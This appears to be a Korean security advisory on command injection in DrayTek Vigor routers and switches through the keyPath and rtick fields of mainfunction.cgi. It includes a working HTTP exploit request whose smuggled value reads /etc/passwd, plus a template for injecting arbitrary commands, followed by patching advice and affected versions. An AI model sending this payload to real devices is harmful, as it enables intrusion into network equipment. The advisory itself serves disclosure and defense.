loading
본문으로 바로가기

DrayTek은 방화벽, VPN 장치, 라우터 및 무선 LAN 장치를 포함한 광대역 CPE 제조업체입니다. DrayTek 장치에서 임의의 코드 실행을 허용 할 수있는 여러 가지 취약점이 발견되었고 성공적으로 악용하면 영향을받는 시스템에서 임의의 코드를 실행할 수 있습니다.

 

이를 통해 공격자는 네트워크 트래픽을 도청하고 SSH 및 웹 기반 백도어를 운영하며 시스템 계정을 만들 수 있습니다.

 

취약점의 핵심은 keyPath rtick 필드입니다. 

keyPath 필드의 입력 제어가 없다면 /www/cgi-bin/mainfunction.cgi에서 사용하는 formLogin() 함수를 통해 임의의 명령을 주입 할 수 있습니다.

rtick 필드의 입력 제어가 없다면 /www/cgi-bin/mainfunction.cgi에서 사용하는 formCaptcha() 함수를 통해 임의의 명령을 주입 할 수 있습니다.

 

1. Payload

www.example.com/cgi-bin/mainfunction.cgi

 

2. 공격구문

POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 1.2.3.4
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a

/bin/sh -c 'CMD'

 

strings.ReplaceAll(payload,"CMD", cmd)

strings.ReplaceAll(payload," ", "${IFS}")

 

※ 해결방안

1. 적절한 테스트 후, 즉시 DrayTek에서 제공하는 적절한 패치 또는 완화를 취약한 시스템에 적용해야합니다.

2. 인가받은 IP 그리고 내부적으로만 원격 액세스를 제한해야합니다.

3. 최소 시스템 권한을 모든 시스템 및 서비스에 적용해야합니다.

 

**패치를 적용해도 이미 설치된 백도어 계정은 지워지지 않으므로, 점검을 진행해야합니다.

 

◈ 영향받는 버젼

Vigor2960 <v1.5.1

Vigor300B <v1.5.1

Vigor3900 <v1.5.1

VigorSwitch20P2121 <= v2.3.2

VigorSwitch20G1280 <= v2.3.2

VigorSwitch20P1280 <= v2.3.2

VigorSwitch20G2280 <= v2.3.2

VigorSwitch20P2280 <= v2.3.2